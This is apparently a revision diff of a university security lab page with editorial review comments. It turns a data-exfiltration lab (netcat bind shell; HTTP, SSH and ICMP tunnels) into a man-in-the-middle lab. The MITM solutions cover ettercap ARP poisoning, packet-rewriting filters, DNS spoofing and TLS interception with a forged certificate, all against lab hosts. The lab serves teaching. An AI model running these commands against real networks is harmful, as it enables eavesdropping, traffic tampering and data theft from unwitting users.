This shows you the differences between two versions of the page.
cdci:labs:6 [2020/03/17 01:27] mihai.chiroiu [06. [20p] ICMP exfiltration] |
cdci:labs:6 [2025/01/21 19:23] (current) mihai.chiroiu |
---|---|---|---|
Line 1: | Line 1: | ||
- | ====== Lab06. Data exfiltration ====== | + | ====== Lab06. Man-in-the-middle attack ====== |
+ | |||
+ | <note warning> | ||
+ | Important read to be graded! | ||
+ | {{page>:cdci:rec&nofooter&noeditbutton&noheader}} | ||
+ | </note> | ||
===== Objectives ===== | ===== Objectives ===== | ||
- | * Basic usage of the netcat tool | + | * MITM using ettercap tool |
- | * Basic usage of the ssh tool | + | * Wireshark usage for protocol dissection - DNS |
- | * Data exfiltration through DNS, HTTP, ICMP and UDP | + | * Understanding attacks on ARP |
+ | * Learning different types of MITM | ||
===== Topology ===== | ===== Topology ===== | ||
- | {{ :cdci:labs:cdci_lab06-exfiltration-topology.png?direct&600 |}} | + | {{ :cdci:labs:cdci_lab04-mitm-topology.png?direct&600 |}} |
===== Tasks ===== | ===== Tasks ===== | ||
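Review bot: the lab numbering in this hunk is inconsistent: the new heading reads `Lab06. Man-in-the-middle attack` and the page id is `cdci:labs:6`, yet the topology image is now `cdci_lab04-mitm-topology.png`; either rename the media file to match lab06 or keep the lab04 id in the heading, otherwise the image link breaks the first time the lab04 media is moved. The `<note warning>` text `Important read to be graded!` is missing punctuation and a subject; `Important: read this to be graded!` is clearer. The new objective `Wireshark usage for protocol dissection - DNS` would be more accurate as `Wireshark usage for protocol dissection (ARP, DNS, HTTP)`, since the tasks below dissect all three, not only DNS.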
Line 15: | Line 21: | ||
First, make sure that your virtual machine is updated (run the provided update.sh script, or create one). | First, make sure that your virtual machine is updated (run the provided update.sh script, or create one). | ||
- | <code> | ||
- | root@cdci:/# cat update.sh | ||
- | #!/bin/bash | ||
- | # (c) Mihai Chiroiu - CDCI | ||
- | git clone -b labs --single-branch https://github.com/mihai-chiroiu/cdci.git | + | <note tip> |
- | git config user.email "student@upb.ro" | + | There is a small with starting the docker in privileged mode, so please edit this file first: |
+ | <code> | ||
+ | root@cdci:/# vim ~/containernet/mininet/node.py (line 828, privileged = True) | ||
</code> | </code> | ||
+ | </note> | ||
Next, in one terminal start the provided Mininet topology. | Next, in one terminal start the provided Mininet topology. | ||
<code> | <code> | ||
- | root@cdci:/# cd cdci/lab06 | + | root@cdci:/# cd cdci/lab04 |
root@cdci:/# /usr/bin/python3 topology.py | root@cdci:/# /usr/bin/python3 topology.py | ||
</code> | </code> | ||
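Review bot: the new `<note tip>` is missing a word: `There is a small with starting the docker in privileged mode` should read `There is a small issue with starting the docker in privileged mode`. The fix it gives, `vim ~/containernet/mininet/node.py (line 828, privileged = True)`, pins a line number that drifts with every containernet update; describe the edit by name instead (set `privileged = True` where the Docker node is created in `node.py`) so students can find it after an upgrade. The tip also gives no reason for the change; one sentence saying that privileged containers get the host's devices and capabilities, and that this setting belongs on the lab VM only, would justify it and discourage reuse elsewhere. Separately, the listing of `update.sh` (`git clone -b labs --single-branch https://github.com/mihai-chiroiu/cdci.git` and `git config user.email "student@upb.ro"`) is removed while the preceding sentence still says `run the provided update.sh script, or create one`; either keep the listing or drop `or create one`, because students no longer see what the script must contain. Finally, `cd cdci/lab04` appears under a `Lab06` heading, the same numbering mismatch as in the previous hunk.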
Line 34: | Line 39: | ||
==== 02. [5p] Internet connectivity ==== | ==== 02. [5p] Internet connectivity ==== | ||
- | Before you begin, make sure that you have Internet connectivity on all two nodes. R1 should be the gateway. Write down the IP addresses of all the nodes. Use the provided scripts to access the nodes. | + | Before you begin, make sure that you have Internet connectivity on all two nodes (attacker and victim). R1 should be the gateway for the Attacker and Victim. Write down the MAC and IP addresses of all 3 nodes (including the gateway). Use the provided scripts to access the nodes. |
<code> | <code> | ||
- | root@ip-172-30-0-165:/# ./h1.sh | + | root@ip-172-30-0-165:/# ./attacker_bash.sh |
- | root@h1:/# | + | root@attacker:/# |
- | root@ip-172-30-0-165:/# ./h2.sh | + | root@ip-172-30-0-165:/# ./victim_bash.sh |
- | root@h2:/# | + | root@victim:/# |
- | + | ||
- | root@ip-172-30-0-165:/# ./ids.sh | + | |
- | root@IDS:/# | + | |
</code> | </code> | ||
- | ==== 03. [15p] Plain text exfiltration ==== | + | ==== 03. [30p] ARP poisoning MITM attack ==== |
- | Netcat, also known as the 'TCP/IP Swiss Army Knife,' can be used to send data between two hosts. Create a client/server connection over port 8080. By default, the data send from the client will be printed on the server. | + | The goal of this exercise is to pass all the victim's traffic through the attacker's machine. From the Attacker node start an ARP poisoning mitm attack against the Victim machine using ettercap tool. Use “ping” tool from Victim and make sure that all traffic (including to outside) goes through the Attacker’s node (use extra verbose option for ettercap). |
- | + | ||
- | The switch in the topology is configured to mirror all traffic to IDS. Use this feature to save the traffic in a PCAP file using 'tcpdump'. Use Netcat to grant the client shell access on the server (hint: '-c' param on the server side). | + | |
<note tip> | <note tip> | ||
- | For tcpdump use the '-Z root' params in order to override the privileges and allow saving data as root. | + | Make sure that you enable remote sniffing. To exit ettercap simply press Q. |
- | </note> | + | </note> |
- | Download the previously saved PCAP file to your local computer and analyse it using Wireshark. Use the "Follow TCP stream" option from Wireshark to observe the traffic flow between the two hosts. | + | Use tcpdump to save all the traffic from the victim and analyze it using Wireshark. Try to answer the following questions: |
- | + | * Can you spot the Gratuitous ARP packet sent when infecting the victim? | |
- | <note tip> | + | * Look into the layer 2 of the packets and see how the destination MAC address has changed under the attack. |
- | To copy data from inside the IDS note to the virtual machine use the provided script. | + | * Can you spot the Gratuitous ARP packet when the infection is stopped? |
- | <code> | + | |
- | ./copy_from_node.sh IDS /root/traffic.pcap /home/ubuntu/ | + | |
- | </code> | + | |
- | </note> | + | |
<solution> | <solution> | ||
<code> | <code> | ||
- | root@h2:/# nc -l -p 8080 | + | root@attacker:/# ettercap -E -T -M ARP:remote /192.168.16.100// /192.168.16.1// |
- | test | + | |
- | root@h1:/# nc 192.168.16.3 8080 | + | |
- | test | + | |
- | root@h2:/# nc -l -p 8080 -c /bin/bash | + | ettercap 0.8.3 copyright 2001-2019 Ettercap Development Team |
- | [...] | + | |
- | root@h1:/# nc 192.168.16.3 8080 | + | Listening on: |
- | ls | + | attacker-eth0 -> FE:14:85:E7:5F:D0 |
- | bin | + | 192.168.16.2/255.255.255.0 |
- | boot | + | * |==================================================>| 100.00 % |
- | dev | + | |
[...] | [...] | ||
+ | |||
+ | Sat Mar 14 20:39:26 2020 [835705] | ||
+ | D2:5D:2C:AD:D4:F5 --> FE:14:85:E7:5F:D0 | ||
+ | 192.168.16.100:0 --> 8.8.8.8:0 | P (0) | ||
+ | | ||
+ | | ||
+ | root@attacker:/# tcpdump -n -i Attacker-eth0 -w mitm.pcap | ||
</code> | </code> | ||
</solution> | </solution> | ||
- | ==== 04. [10p] HTTP exfiltration ==== | + | ==== 04. [10p] Traffic dissection ==== |
- | While Netcat is a good tool, the traffic that it sends can be easily removed by any Deep Packet Inspection solutions because it is a simple DATA over TCP connection. Now, use the httptunnel (hts & htc) suite to create a HTTP tunnel between the two nodes. Use this tunnel to establish a client/server connection and exfiltrate data (similar to the previous exercise). | + | Investigate the following traffic as it is generated by the Victim node: |
+ | * HTTP and DNS while under MITM attack. Can you use Wireshark and rebuild/export the HTML pages that the victim opened (use wget or curl)?. | ||
- | To view the traffic you can use tcpdump on the IDS (to view it locally or to transfer it to your computer and open it with Wireshark). | + | <note tip> |
+ | Transfer the pcap file to your local computer and open it in wireshark. Then select File->Export HTML Objects. | ||
+ | </note> | ||
- | <solution> | + | ==== 05. [20p] Raw packets altering ==== |
- | <code> | + | |
- | root@h2:/# hts -F 127.0.0.1:8080 80 | + | |
- | root@h2:/# netstat -nltp | + | |
- | Active Internet connections (only servers) | + | |
- | Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name | + | |
- | tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 90/hts | + | |
- | root@h2:/# nc -l -p 8080 -k | + | |
- | TEST | + | |
- | root@h1:/# htc -F8080 192.168.16.3:80 | + | Ettercap filters can also be used to modify packets as they pass through the attacker’s node. Use the provided filter to change icmp type from echo to reply (Hint: [[https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtml]]). |
- | root@h1:/# nc 127.0.0.1 8080 | + | * You should observe the changes on the victim (no more replies). |
- | TEST | + | * Use tcpdump on the attacker to inspect the changes. |
- | </code> | + | <note tip> |
- | </solution> | + | [[https://linux.die.net/man/8/etterfilter]] |
- | ==== 05. [15p] SSH exfiltration ==== | + | </note> |
- | + | ||
- | As seen, the previous solutions send data in clear text. Create an ssh tunnel and use it to exfiltrate data via a similar client/server Netcat architecture. For this, you have to use one node as an SSH server and the second one as a client. Use the following configuration on the SSH Server | + | |
<code> | <code> | ||
- | root@h2:/# vim /etc/ssh/sshd_config | + | cat icmp.filter |
- | PasswordAuthentication yes | + | if (ip.proto == ICMP) { |
- | PermitRootLogin yes | + | msg("Changing ICMP type!\n"); |
- | + | replace("8.8.8.8", "8.8.4.4"); | |
- | root@h2:/# service ssh restart | + | } |
- | root@h2:/# netstat -nltp | + | etterfilter icmp.filter -o icmp.ef |
- | Active Internet connections (only servers) | + | |
- | Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name | + | |
- | tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 198/sshd | + | |
</code> | </code> | ||
- | |||
- | <note> | ||
- | In general this might not be a good idea ([[http://sites.inka.de/bigred/devel/tcp-tcp.html|http://sites.inka.de/bigred/devel/tcp-tcp.html]]). | ||
- | </note> | ||
- | |||
- | To view the traffic you can use tcpdump on the IDS (to view it locally or to transfer it to your computer and open it with Wireshark). | ||
<solution> | <solution> | ||
<code> | <code> | ||
- | root@h2:/# nc -l -p 8080 -k | + | cat icmp.filter |
- | TEST | + | if (ip.proto == ICMP && icmp.type == 0) { |
- | + | msg("Changing address!\n"); | |
- | root@h1:/# ssh -N -L 8080:127.0.0.1:8080 root@192.168.16.3 -f | + | icmp.type = 8; |
- | root@192.168.16.3's password: | + | } |
- | bind: Cannot assign requested address | + | etterfilter icmp.filter -o icmp.ef |
- | root@h1:/# nc 127.0.0.1 8080 | + | ettercap -T -F icmp.ef -M ARP:remote /192.168.16.100// /192.168.16.1// |
- | TEST | + | |
</code> | </code> | ||
</solution> | </solution> | ||
- | ==== 06. [20p] ICMP exfiltration ==== | ||
- | Another protocol that can be used to exfiltrate data is ICMP. You can use the [[https://linux.die.net/man/8/ptunnel|ptunnel]] application and tunnel the Netcat client/server connection over ICMP. | ||
- | To view the traffic you can use tcpdump on the IDS (to view it locally or to transfer it to your computer and open it with Wireshark). For this exercise we strongly encourage you to view the data in Wireshark. | + | ==== 06. [10p] DNS traffic altering ==== |
- | <solution> | + | Another interesting plugin of Ettercap is DNS spoofing. Config it such that any queries for the “facebook.com” domain name are translated into “127.0.0.1”. |
- | <code> | + | |
- | root@h2:/# ptunnel & | + | |
- | [1] 331 | + | |
- | root@h2:/# [inf]: Starting ptunnel v 0.72. | + | |
- | [inf]: (c) 2004-2011 Daniel Stoedle, <daniels@cs.uit.no> | + | |
- | [inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr> | + | |
- | [inf]: Forwarding incoming ping packets over TCP. | + | |
- | [inf]: Ping proxy is listening in privileged mode. | + | |
- | root@h2:/# | + | |
- | root@h2:/# | + | |
- | root@h2:/# nc -l -p 8080 -k | + | |
- | [inf]: Incoming tunnel request from 192.168.16.2. | + | |
- | [inf]: Starting new session to 127.0.0.1:8080 with ID 18665 | + | |
- | TEST | + | |
- | [inf]: Received session close from remote peer. | + | |
- | [inf]: | + | |
- | Session statistics: | + | |
- | [inf]: I/O: 0.00/ 0.00 mb ICMP I/O/R: 13/ 1/ 0 Loss: 0.0% | + | |
- | [inf]: | + | |
- | root@h2:/# | + | |
+ | <note tip> | ||
+ | [[https://linux.die.net/man/8/ettercap_plugins]] | ||
+ | </note> | ||
- | root@h1:/# kill -9 150 | + | <solution> |
- | root@h1:/# netstat -nltp | + | <code> |
- | Active Internet connections (only servers) | + | root@attacker:~# cat /etc/ettercap/etter.dns |
- | Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name | + | www.facebook.com A 127.0.0.1 |
- | root@h1:/# ptunnel -p 192.168.16.3 -lp 8080 -da 127.0.0.1 -dp 8080 & | + | root@attacker:/# ettercap -P dns_spoof -E -T -M ARP:remote /192.168.16.100// /192.168.16.1// |
- | [2] 161 | + | |
- | root@h1:/# [inf]: Starting ptunnel v 0.72. | + | |
- | [inf]: (c) 2004-2011 Daniel Stoedle, <daniels@cs.uit.no> | + | |
- | [inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr> | + | |
- | [inf]: Relaying packets from incoming TCP streams. | + | |
- | root@h1:/# netstat -nltp | + | Listening on: |
- | Active Internet connections (only servers) | + | attacker-eth0 -> 1E:D4:8A:37:43:CD |
- | Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name | + | 192.168.16.2/255.255.255.0 |
- | tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 161/ptunnel | + | * |==================================================>| 100.00 % |
- | root@h1:/# nc 127.0.0.1 8080 | + | Activating dns_spoof plugin... |
- | [inf]: Incoming connection. | + | |
- | [evt]: No running proxy thread - starting it. | + | |
- | [inf]: Ping proxy is listening in privileged mode. | + | |
- | TEST | + | |
- | ^C | + | Sat Mar 14 21:22:44 2020 [161164] |
- | root@h1:/# [inf]: Connection closed or lost. | + | CE:82:B8:0E:6B:72 --> 1E:D4:8A:37:43:CD |
- | [inf]: Session statistics: | + | UDP 192.168.16.100:48445 --> 172.30.0.2:53 | (34) |
- | [inf]: I/O: 0.00/ 0.00 mb ICMP I/O/R: 25/ 4/ 0 Loss: 0.0% | + | A............www.facebook.com.....dns_spoof: A [www.facebook.com] spoofed to [127.0.0.1] TTL [3600 s] |
- | root@h1:/# | ||
- | root@h1:/# | ||
- | root@h1:/# netstat -nltp | ||
- | Active Internet connections (only servers) | ||
- | Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name | ||
- | tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 161/ptunnel | ||
+ | root@victim:/# nslookup www.facebook.com | ||
+ | Non-authoritative answer: | ||
+ | www.facebook.com canonical name = star-mini.c10r.facebook.com. | ||
+ | Name: star-mini.c10r.facebook.com | ||
+ | Address: 157.240.221.35 | ||
+ | [...] | ||
+ | root@victim:/# nslookup www.facebook.com | ||
+ | Name: www.facebook.com | ||
+ | Address: 127.0.0.1 | ||
</code> | </code> | ||
</solution> | </solution> | ||
+ | ==== 07. [20p] HTTPS traffic inspection ==== | ||
- | ==== 07. [20p] DNS exfiltration ==== | + | Unfortunately, HTTPS traffic cannot be inspected, or can it :). We will try to use ettercap and observe changes in the certificate chain when MITM attack is active. |
+ | * First, use the “openssl s_client” tool (or other) to see the certificates path for the “www.google.com” website. <code> root@victim:~# openssl s_client -showcerts www.google.com:443 | ||
+ | CONNECTED(00000005) | ||
+ | depth=2 OU = GlobalSign Root CA - R2, O = GlobalSign, CN = GlobalSign | ||
+ | verify return:1 | ||
+ | depth=1 C = US, O = Google Trust Services, CN = GTS CA 1O1 | ||
+ | verify return:1 | ||
+ | depth=0 C = US, ST = California, L = Mountain View, O = Google LLC, CN = www.google.com | ||
+ | verify return:1 | ||
+ | </code> | ||
+ | * Next, run ettercap without TLS MITM (-S). | ||
+ | * Now, run ettercap including TLS MITM. | ||
- | To view the traffic you can use tcpdump on the IDS (to view it locally or to transfer it to your computer and open it with Wireshark). | + | <note tip> |
+ | For the TLS MITM you will require a certificate and a private key to be used when running ettercap (hint: [[https://manpages.debian.org/jessie/ettercap-common/ettercap.8.en.html|--certificate]]). Use the following code to create the private key and certificate. | ||
+ | <code> | ||
+ | root@attacker:~# openssl genrsa -out hacker.pem 2048 | ||
+ | root@attacker:~# openssl req -x509 -new -key hacker.pem -sha256 -days 365 -out hacker.crt | ||
+ | </code> | ||
+ | </note> | ||
- | <solution> | + | <note tip> |
+ | For the MITM TLS attack we have to allow ettercap to run as root user and enable iptables configurations. This is required to allow ettercap SSL filter to receive and decode the TLS traffic. Modify the configuration file, “/etc/ettercap/etter.conf”, with the following. | ||
<code> | <code> | ||
+ | ec_uid = 0 | ||
+ | ec_gid = 0 | ||
+ | # if you use iptables: | ||
+ | redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" | ||
+ | redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" | ||
+ | redir6_command_on = "ip6tables -t nat -A PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport" | ||
+ | redir6_command_off = "ip6tables -t nat -D PREROUTING -i %iface -p tcp -s %source -d %destination --dport %port -j REDIRECT --to-port %rport" | ||
</code> | </code> | ||
- | </solution> | + | </note> |
+ | <solution> | ||
+ | <code> | ||
+ | root@attacker:~# ettercap -E -T -M ARP:remote --private-key hacker.pem --certificate hacker.crt /192.168.16.100// /192.168.16.1// | ||
+ | |||
+ | root@victim:~# openssl s_client -showcerts www.google.com:443 | ||
+ | CONNECTED(00000005) | ||
+ | depth=0 C = AU, ST = Some-State, O = Internet Widgits Pty Ltd | ||
+ | verify error:num=18:self signed certificate | ||
+ | verify return:1 | ||
+ | depth=0 C = AU, ST = Some-State, O = Internet Widgits Pty Ltd | ||
+ | verify return:1 | ||
+ | --- | ||
+ | </code> | ||
+ | </solution> |
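Review bot: task 05's text and its solution disagree: the text says to `change icmp type from echo to reply`, but the solution filter `if (ip.proto == ICMP && icmp.type == 0) { icmp.type = 8; }` does the reverse (it rewrites replies, type 0, into echo requests, type 8), which is exactly what produces the observed `no more replies` on the victim; reword the task to `from reply to echo` so students who follow the text are not marked wrong. Smaller points in the same hunk: (1) the provided starting filter pairs `msg("Changing ICMP type!\n")` with `replace("8.8.8.8", "8.8.4.4")`, a payload substitution that does not change the ICMP type, so the message is misleading as a template; (2) the ARP solution's `tcpdump -n -i Attacker-eth0 -w mitm.pcap` does not match the interface name ettercap prints in the same listing, `attacker-eth0`, and interface names are case-sensitive; (3) task 06 asks for queries for `facebook.com`, but the solution's `etter.dns` entry `www.facebook.com A 127.0.0.1` matches only that host, so either name `www.facebook.com` in the task or add a wildcard entry for the domain; (4) task 02 says `all two nodes (attacker and victim)` and then `all 3 nodes (including the gateway)`; choose one count; (5) the HTTPS solution output already contains the detection signal, `verify error:num=18:self signed certificate`, and the `etter.conf` change `ec_uid = 0` / `ec_gid = 0` keeps ettercap running as root with no privilege drop; asking students to explain that verify error (and that a browser would warn on, or with HSTS refuse, such a chain) turns the exercise into a detection lesson, and a closing instruction to revert the `etter.conf` and `node.py` changes after the lab would be worth one line.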